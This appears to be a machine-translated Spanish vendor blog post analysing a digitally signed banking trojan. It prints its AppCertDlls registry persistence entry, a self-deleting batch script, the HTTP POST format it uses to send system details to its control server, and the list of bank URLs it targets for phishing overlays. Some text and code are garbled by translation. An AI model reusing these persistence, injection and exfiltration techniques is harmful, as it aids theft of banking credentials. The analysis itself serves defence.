Tiempo de leer: 5 minutos
Como parte del análisis continuo de Comodo Labs de "Firma digital" (confirmando que el autor del software y garantizando que el código del programa de computadora no ha sido alterado o dañado desde que se firmó) "malware" (software utilizado o creado para interrumpir el funcionamiento de la computadora, recopilar información confidencial, o obtener acceso a sistemas informáticos), recientemente descubrimos una nueva muestra que utiliza una combinación interesante y potencialmente devastadora de técnicas para entregar su "carga útil" (carga de una transmisión de datos).
Comenzando con un "cuentagotas" (programa de instalación) firmado digitalmente, el malware pudo inyectarse con éxito en los "procesos" de Windows (instancias de programas informáticos que se ejecutan); omitir el "cortafuegos" (protege contra las amenazas de la Internet pública) y los "mecanismos de protección contra intrusiones del host" (supervisar una sola computadora en busca de actividad sospechosa analizando los eventos que ocurren dentro de esa computadora); enviar detalles del usuario a un "servidor" de control (hardware informático dedicado a ejecutar uno o más servicios); descargue "archivos de configuración" adicionales (configure los ajustes iniciales para algunos programas de computadora) y finalmente dirija a sus víctimas a sitios web de "phishing" (diseñados para parecerse a otros sitios web en un intento de robar la información personal de los usuarios) que solicitan los nombres de usuario bancarios del usuario / contraseñas Este documento contiene una descripción detallada de nuestras observaciones.
El componente cuentagotas (instalador) del malware fue firmado digitalmente por una Autoridad de Certificación de confianza. Debido a que el instalador era 'confiable', pudo evadir la detección por parte de los sistemas heurísticos y de protección contra intrusiones en el host (HIPS) de muchos populares mejor antivirus y Internet Security .
Tras la ejecución, el cuentagotas primero determina la arquitectura del sistema operativo Windows (32 bits o 64 bits) y luego extrae el módulo principal apropiado de los recursos del archivo "PE" (ejecutable portátil).
El nombre de archivo de este módulo principal se genera concatenando dos fragmentos con nombre de dos archivos aleatorios "* .exe" (ejecutable de Windows) en la carpeta del sistema de Windows. Por ejemplo, "diskpart.exe" (intérprete de comandos de modo de texto de Windows) y "eventvwr.exe" (Microsoft Event Viewer) generan el nombre de archivo "disktvwr.dll".
El módulo principal es la "DLL" de PE (Biblioteca de funciones dinámicas y otra información a la que puede acceder un programa de Windows) que se coloca en la carpeta del sistema de Windows con este nombre generado. Luego se inyecta en el proceso del sistema operativo "explorer.exe" (Windows Explorer).
Está configurado para inyección automática en la mayoría de los procesos del sistema operativo y aplicaciones de usuario a través de un valor nombrado aleatoriamente de una clave oscura del Registro de Windows (similar a una carpeta):
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerAppCertDlls] "ddeskeys" = "C: Windowssystem32disktvwr.dll"
Como resultado, la función "CreateProcessNotify", exportada por el "módulo" de malware (parte del programa que realiza una función específica y puede usarse sola o combinada con otros módulos del mismo programa), se solicita en la creación de cada nuevo proceso Esto hace que la DLL de malware se inyecte en la mayoría de los procesos del sistema operativo y las aplicaciones de usuario.
Después de esta operación, el cuentagotas se elimina mediante la ejecución de un simple archivo de script "BAT" (lote) "DOS" (sistema operativo de disco):
1342562.bat: attrib -s -r -h% 1: hkiflg del% 1 si existe% 1 goto hkiflg del% 0
El módulo principal se inyecta en el proceso "explorer.exe" y actúa como una aplicación de servidor. Abre una "tubería" (denominada conexión de software temporal entre dos programas o comandos) como un ID único (UID) de 128 bits, por ejemplo, "\ .pipe {b2459e76-035d-2d18-0a97-debbcce1c0a5}", y espera mensajes entrantes. Los módulos inyectados en otros procesos del sistema y aplicaciones de usuario actúan como "clientes" (aplicaciones o sistemas que acceden a un servicio puesto a disposición por un servidor) y se comunican con el servidor a través de la canalización con nombre.
Los módulos inyectados en las aplicaciones de navegador web “iexplore.exe” (Microsoft Internet Explorer) y “firefox.exe” (Mozilla Firefox) se utilizan para la comunicación con el servidor de control remoto. Esto engaña a cualquiera cortafuegos y la tecnología HIPS al hacer que la actividad de red generada por el aparece el malware haber sido iniciado por el usuario. La versión actual del malware no es compatible con otros navegadores como "chrome.exe" (Google Chrome), "opera.exe" (Opera) y "safari.exe" (Safari de Apple). Para circunnavegar este problema, evita que estos navegadores se abran y obliga al usuario a usar uno de los navegadores compatibles. El malware se comunica con su servidor de control remoto imitando el acceso a un tema del foro. Inicialmente, envía un "HTTP" (Protocolo de transferencia de hipertexto) "POST" (método de solicitud para solicitar que el servidor web acepte los datos incluidos en el cuerpo del mensaje de solicitud) para el almacenamiento utilizando una "URL" (dirección global de localización de recursos uniforme de una web página en la World Wide Web) del siguiente formato:
http://*.*.*.*/viewtopic.php?f=159&t=17216&sid5=c0dcd0254daef45e27b86c3b5995a14c
... con el cuerpo de la solicitud que contiene información básica sobre el sistema del usuario y el módulo de malware instalado:
“user_id=1110380395&version_id=42&socks=0&build=32940&crc=50838475& win=Microsoft+Windows+XP+Professional+Service+Pack+3+(build:+2600)&arch=x86+32bit&user=Admin”
Luego recibirá un archivo de configuración actualizado del servidor remoto. El malware almacena la información de configuración y versión en una clave del Registro de Windows llamada usando un UID de 128 bits de una manera similar que se ha usado para la tubería nombrada:
[HKEY_CURRENT_USERSoftwareAppDataLow{21414dba-01d1-50fc-8e2b-a28ff0952499}] "k1"=dword:b12564d0 "k2"=dword:473d87bb "Version"=dword:0000002a "Data"=hex:ca,2b,09,00,1b,e1,80,02,41,4c,3a,45,42,43,61,5f,09,31,39,36,cd,2f,
...
El objetivo principal de este malware es robar información personal, como información bancaria o cuentas de tarjetas de crédito. Esta es una lista de URL monitoreadas por el malware de acuerdo con un archivo de configuración reciente:
bankofamerica.com/accounts-overview/accounts-overview.go bankofamerica.com/login/sign-in/signOnScreen.go bankofamerica.com/login/sign-in/validatePassword.go bankofamerica.com/myaccounts/ barclaycardus.com/app /ccsite/logon/loginUserDyn.jsp billmelater.com/login/challenge.xhtml billmelater.com/your-account/home.xhtml bofa.com chaseonline.chase.com/gw/secure/ena chaseonline.chase.com/MyAccounts. aspx chaseonline.chase.com/secure/Profile/UpdateContactInfo/UpdateContact.aspx client.schwab.com/Accounts/ client.schwab.com/Accounts/Summary/Summary.aspx client.schwab.com/Service/MyProfile/MailingAddress.aspx consumercenter.gogecapital.com/consumercenter/homeaction.do discovercard.com/cardmembersvcs/achome/homepage mbwebexpress.blilk.com/Core/Authentication/MFAPassword.aspx mfasa.chase.com/auth/auth-stoken-osl.html en línea. americanexpress.com/myca/acctmgmt/ online.citibank.com online.wellsfargo.com/das/cgi-bin/session.cgi onlinebanking.pnc.com/ onlinebanking.tdbank.com/login.asp paypal.com/us/cgi - bin / webscr? cmd = _account paypal.com/us/cgi-bin/webscr?cmd=_login-done safe.bankofamerica.com/myaccounts/accounts-overview/accounts-overview.go safe.bankofamerica.com/myaccounts/brain /redirect.go safe.bankofamerica.com/myaccounts/signin/signIn.go?isSecureMobil servicing.capitalone.com/C1/Accounts/Summary.aspx shop.aafes.com/shop/Login.aspx shopmyexchange.com sitekey.bankofamerica. com / sas / signon.do sitekey.bankofamerica.com/sas/signonSetup.do sitekey.bankofamerica.com/sas/verifyImage.do ss2.experian.com/securecontrol/reset/ssphome suntrust.com/portal/server.pt us .etrade.com / e / t / accounts / accountsCombo us.hsbc.com/1/2/!ut/ wwws.ameritrade.com/cgi-bin/apps/SecurityChallenge
Una vez que un usuario accede a una de las URL monitoreadas, el malware genera una página de phishing que le pide al usuario que ingrese los detalles de su cuenta (incluyendo el nombre de usuario, la contraseña y el número de tarjeta de crédito) con el pretexto de recuperar la contraseña de su cuenta o habilitar medidas de seguridad:
Informacion del archivo:
Dropper EXE: Size: 285264 SHA-1: b9f07c2eec5277bfc91d4bb9b8bac4e8d4cc8632 Signature: TrojWare.Win32.TrojanSpy.Volisk.a x86 DLL: Size: 88576 SHA-1: ba7f13855e7ad9c32917188281c4420cef8a830e Signature: TrojWare.Win32.TrojanSpy.Volisk.a x64 DLL: Size: 98304 SHA-1: 372c2eafd39b317e6a94e84d673d394b2afd4b3f Signature: TrojWare.Win32.TrojanSpy.Volisk.a
Instrucciones de diagnóstico, eliminación y protección
Si su computadora no tiene un Antivirus or Internet Security programa instalado y cree que puede haber sido infectado por "malware" (software malicioso):
1. Descargar Comodo Antivirus y realice un análisis completo con una base de datos antivirus actualizada.
2. Eliminar Malware encontrado eligiendo entre las opciones recomendadas y manténgase protegido.
PRUEBE LA SEGURIDAD DE SU CORREO ELECTRÓNICO OBTENGA SU TARJETA DE SEGURIDAD INSTANTÁNEA GRATIS Fuente: https://blog.comodo.com/malware/trojware-win32-trojanspy-volisk-a/
